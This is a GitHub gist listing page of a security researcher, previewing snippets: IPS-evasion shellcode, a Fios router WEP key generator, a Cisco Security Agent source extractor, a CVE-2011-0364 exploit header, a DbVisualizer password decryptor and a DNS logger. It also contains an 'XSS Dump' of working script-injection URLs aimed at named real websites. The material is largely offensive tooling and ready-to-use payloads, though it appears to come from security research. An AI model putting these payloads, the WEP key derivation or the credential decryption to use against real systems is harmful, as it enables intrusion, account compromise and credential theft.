Skip to content

Instantly share code, notes, and snippets.

Gerry Eisenhaur gerry

Block or report user

Report or block gerry

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@gerry
gerry / evasions.py
Created Apr 18, 2010
collection of various IPS evasions
View evasions.py
offset = 0x1000 - len(scode) - 32
tls_header = "\xE8\x00\x00\x00\x00" # CALL $+5
tls_header += "\x5E" # POP ESI
tls_header += "\x83\xC6\x1B" # ADD ESI, 0x1b
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode)
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00" # MOV EDI,DWORD PTR FS:[30]
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset
tls_header += "\x57" # PUSH EDI
tls_header += "\xFC" # CLD
tls_header += "\xF3\xA4" # REP MOVSB [EDI], [ESI]
View fios-wep.py
# Calculate the lower 6 bytes of the WEP key, the upper 4 are from the MAC
# address of the router (1801 or 1F90)
def get_key(essid):
key = sum(int(val, 36) * (36**idx) for idx, val in enumerate(essid))
return hex(key)
# >>> print get_key("E3X12")
# 0x349fca
@gerry
gerry / htl_extract.py
Last active Sep 24, 2015
Extracts the embedded source code from Cisco Security Agent Management Console.
View htl_extract.py
#!/usr/bin/env python
"""htl_extract.py, Extracts the embedded source code from Cisco Security Agent Management Console.
Gerry <gerry@hiredhacker.com>
"""
import os
import sys
import struct
import pefile
from itertools import takewhile
@gerry
gerry / XSS Dump
Created Jan 5, 2011
Collection of random web bugs (mainly XSS)
View XSS Dump
https://hackalert.armorize.com/givepassword.php/%22%3E%3Cscript%3Ealert('oops')%3C/script%3E
http://data.mint.com/search?q=%22)})}alert('pwned');{({/*&offset=0&max=30&numpages=4
https://biz.yelp.com/signup/dAecu6T1DJiDrAVZ-uIVtw/?return_url=%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E
https://support.steampowered.com/register.php?password2=%22/style=%22position:fixed;top:0px;left:0px;height:100%;width:100%%22/onmouseover=%22alert%28/XSS/%29
https://idp.godaddy.com/Error.aspx?SPKey=%22;alert%281%29;//
http://sandboxbeta.sunbeltsoftware.com/loginlocked.aspx?FTVAR_REDIRECTURLFRM=%22%20STYLE%3d%22width:%20expression(window.x?0:(alert(/XSS/),window.x%3d1));%22
http://www.webroot.com/En_US/search-results.html?q=');alert('gerry
http://www.mcafee.com/apps/search/threat.aspx?q=';alert(1);//&v=malware
http://products.verizonwireless.com/index.aspx?';alert(1)//
@gerry
gerry / st_upload-exploit.py
Last active Aug 23, 2016
Exploit for CVE-2011-0364
View st_upload-exploit.py
#!/usr/bin/env python
# Thu 24 Jun 2010 04:20:52 AM EDT
import httplib
import mimetools
import StringIO
_boundary = mimetools.choose_boundary()
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
_csamc = "192.168.0.108"
@gerry
gerry / msf-rex.gemspec
Created Nov 8, 2011 — forked from emonti/msf-rex.gemspec
gemspec to get a ruby gem out of lib/rex in the metasploit framework
View msf-rex.gemspec
# Drop this into msf3 root-dir as 'msf-rex.gemspec'.
#
# Create gem with:
# $ gem build msf-rex.gemspec
#
# Note there's already a "rex" rubygem, which is why we used 'msf-rex'.
# We can still "require 'rex'" though.
$: << 'lib'
@gerry
gerry / import_nessus_nbe.diff
Created Feb 27, 2013
Quick fix for importing Nessus NBE files
View import_nessus_nbe.diff
diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb
index 7e0bc73..9b5c8d8 100644
--- a/lib/msf/core/db.rb
+++ b/lib/msf/core/db.rb
@@ -5163,11 +5163,11 @@ class DBManager
# There is no place the NBE actually stores the plugin name used to
# scan. You get "Security Note" or "Security Warning," and that's it.
def import_nessus_nbe(args={}, &block)
- data = args[:data]
+ nbe_data = args[:data]
@gerry
gerry / decrypt_dbvis.py
Last active Apr 20, 2018
A quick hack to extract and decrypt credentials from DbVisualizer config files.
View decrypt_dbvis.py
#!/usr/bin/env python
# decrypt_dbvis.py ~ gerry@twitter.com
# DbVisualizer uses PBEWithMD5AndDES with a static key to store passwords.
# This is a quick hack to extract and decrypt credentials from DbVisualizer config files.
# Tested against DbVisualizer Free 9.0.9 and 9.1.6
"""
[2014-03-25 02:05:30][not-the-sea workspace]$ security/p/gerry/misc/decrypt_dbvis.py
[+] DbVisualizer Password Extractor and Decryptor (@gerryeisenhaur)
[+] Additional Usage Options:
[+] security/p/gerry/misc/decrypt_dbvis.py <config filename>
View keybase.md

Keybase proof

I hereby claim:

  • I am gerry on github.
  • I am gerry (https://keybase.io/gerry) on keybase.
  • I have a public key whose fingerprint is F120 587B A599 B6B6 1ED6 1A37 DD61 36D6 59E5 4DEF

To claim this, I am signing this object:

@gerry
gerry / dns_logger.py
Created Apr 29, 2015
Respond to and record dns lookups.
View dns_logger.py
#!/usr/bin/env python
import sys
import random
import string
import datetime
import itertools
import threading
import traceback
import SocketServer
import operator as op
You can’t perform that action at this time.